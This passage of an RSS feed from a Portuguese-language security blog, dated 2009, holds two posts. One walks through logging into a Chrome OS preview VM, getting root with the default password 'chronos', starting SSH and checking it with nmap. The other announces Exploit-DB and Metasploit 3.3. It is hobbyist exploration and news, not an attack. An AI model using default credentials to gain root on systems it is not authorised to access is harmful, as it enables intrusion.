		<description><![CDATA[Nossa.. saiu em tantos lugares a notícia, que fiquei curioso e dei uma olhada no Google Chrome OS :) Primeiro criei um usuário e baixei a imagem em http://gdgt.com/google/chrome-os/download/. Depois rodei a imagem em um Mac com o VirtualBox, e tentei de diversas maneiras entrar no sistema com a minha conta do google. Sem sucesso! [...]]]></description>
			<content:encoded><![CDATA[<p>Nossa.. saiu em tantos lugares a notícia, que fiquei curioso e dei uma olhada no Google Chrome OS :)<br />
Primeiro criei um usuário e baixei a imagem em <a href="http://gdgt.com/google/chrome-os/download/" target="_blank">http://gdgt.com/google/chrome-os/download/</a>. Depois rodei a imagem em um Mac com o VirtualBox, e tentei de diversas maneiras entrar no sistema com a minha conta do google. Sem sucesso!</p>
<p>Após dar uma &#8220;googleada&#8221;, consegui logar com o usuário chronos (sem senha) no sistema:<br />
<img class="alignnone size-full wp-image-58" title="chrome_os_login" src="http://www.leonardobotelho.com/blog/wp-content/uploads/2009/11/chromeos1.png" alt="chrome_os_login" width="542" height="450" /></p>
<p>Agora você pode entrar com a sua conta do google e utilizar o sistema normalmente.<br />
<img class="alignnone size-full wp-image-69" title="chrome_os_default" src="http://www.leonardobotelho.com/blog/wp-content/uploads/2009/11/chromeos2.png" alt="chrome_os_default" width="542" height="450" /></p>
<p>Podemos também fazer alguma coisa meio n00b, mas que não deixa de ser mais divertido do que abrir o seu e-mail, calendário e etc :P<br />
Como podemos ver, não temos nenhum serviço &#8220;básico&#8221; rodando por padrão:</p>
<blockquote><p>
~# nmap 192.168.1.115</p>
<p>Starting Nmap 5.00 ( http://nmap.org ) at 2009-11-23 01:27 BRST<br />
Interesting ports on 192.168.1.115:<br />
Not shown: 999 filtered ports<br />
PORT   STATE  SERVICE<br />
22/tcp closed ssh<br />
MAC Address: 00:25:00:48:D2:1E (Apple)</p>
<p>Nmap done: 1 IP address (1 host up) scanned in 11.40 seconds
</p></blockquote>
<p>Agora no Chrome OS.. teclamos ctrl+alt+t e teremos acesso ao terminal. Digitamos &#8220;sudo su&#8221; e a senha &#8220;chronos&#8221; para logar com o usuário privilegiado.<br />
Com isso, podemos habilitar o serviço de SSH por exemplo:</p>
<blockquote><p>
/etc/init.d/ssh start
</p></blockquote>
<p><img class="alignnone size-full wp-image-70" title="chrome_os_terminal" src="http://www.leonardobotelho.com/blog/wp-content/uploads/2009/11/chromeos3.png" alt="chrome_os_terminal" width="542" height="450" /></p>
<p>&#8230; e depois executar novamente o nmap para confirmar que o serviço está rodando.</p>
<blockquote><p>
~# nmap 192.168.1.115</p>
<p>Starting Nmap 5.00 ( http://nmap.org ) at 2009-11-23 02:04 BRST<br />
Interesting ports on 192.168.1.115:<br />
Not shown: 999 filtered ports<br />
PORT   STATE SERVICE<br />
22/tcp open  ssh<br />
MAC Address: 00:25:00:48:D2:1E (Apple)</p>
<p>Nmap done: 1 IP address (1 host up) scanned in 5.04 seconds
</p></blockquote>
<p>Agora é usar mais o sistema e aguardar por novas versões do mesmo.<br />
É isso ai.. Abs :D</p>
]]></content:encoded>
			<wfw:commentRss>http://www.leonardobotelho.com/blog/2009/11/google-chrome-os/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>exploit database /&amp;/ metasploit</title>
		<link>http://www.leonardobotelho.com/blog/2009/11/exploit-database-metasploit/</link>
		<comments>http://www.leonardobotelho.com/blog/2009/11/exploit-database-metasploit/#comments</comments>
		<pubDate>Wed, 18 Nov 2009 04:39:29 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[metasploit]]></category>
		<category><![CDATA[tools]]></category>

		<guid isPermaLink="false">http://www.leonardobotelho.com/blog/?p=32</guid>
		<description><![CDATA[Olá! Bom, como são notícias de utilidade pública.. merecem um post :) Após algum tempo sem atualização, o milw0rm.com terá o seu lugar &#8220;tomado&#8221; por outro site. O pessoal da Offensive Security e da Gerix.it irão manter esse novo repositório de exploits. Segundo palavras deles, &#8220;We’ve recreated the milw0rm database, updated it and are now [...]]]></description>
			<content:encoded><![CDATA[<p>Olá!<br />
Bom, como são notícias de utilidade pública.. merecem um post :)</p>
<p>Após algum tempo sem atualização, o milw0rm.com terá o seu lugar &#8220;tomado&#8221; por outro site.<br />
O pessoal da Offensive Security e da Gerix.it irão manter esse novo repositório de exploits. Segundo palavras deles, &#8220;We’ve recreated the milw0rm database, updated it and are now accepting submissions.&#8221;<br />
O design/organização do site é excelente e além do próprio exploit, é possível também baixar a versão vulnerável do software. O site possui as mesmas áreas que o milw0rm: Remote Exploits, Local Exploits, Web Applications, DoS/PoC, Shellcode e Papers.<br />
Good Job! :D</p>
<p><a href="http://exploits.offensive-security.com/" target="_blank">http://exploits.offensive-security.com/</a><br />
<a href="http://twitter.com/exploitdb/" target="_blank">http://twitter.com/exploitdb/</a><br />
#exploitdb</p>
<p>&#8211;</p>
<p>Agora sobre o metasploit, a versão 3.3 foi liberada.<br />
Essa versão inclui 446 exploits, 216 auxiliary modules, centenas de payloads e roda em todos os sistemas operacionais mais modernos, incluindo Linux, Windows, Mac OS X e BSDs.</p>
<p>Diversas correções e melhorias foram feitas desde a versão 3.2:</p>
<p>*The Windows installation now includes a fully-functional console interface&#8230;<br />
*The Linux installers now include everything needed to run the Metasploit Framework&#8230;<br />
*The Metasploit Console now indicates how many days have passed since the last update&#8230;<br />
*The console now supports and enables ANSI colors by default&#8230;<br />
*The database functionality is now enabled by default&#8230;<br />
*Oracle exploit support has been implemented&#8230;<br />
*All TCP-based exploits can now be launched through SOCKS4, SOCKS5, and HTTP proxies&#8230;<br />
*Metasploit now supports 64-bit Windows as a target platform&#8230;<br />
*Support for JSP payloads has been integrated&#8230;</p>
<p>e <a href="http://www.metasploit.com/redmine/projects/framework/wiki/Release_Notes_33" target="_blank">muitas outras</a> excelentes coisas.</p>
<p>Agora é só sair testando e se divertindo :)</p>
<p><a href="http://blog.metasploit.com/" target="_blank">http://blog.metasploit.com/</a><br />
#metasploit</p>
<p>Abs!</p>
]]></content:encoded>
			<wfw:commentRss>http://www.leonardobotelho.com/blog/2009/11/exploit-database-metasploit/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

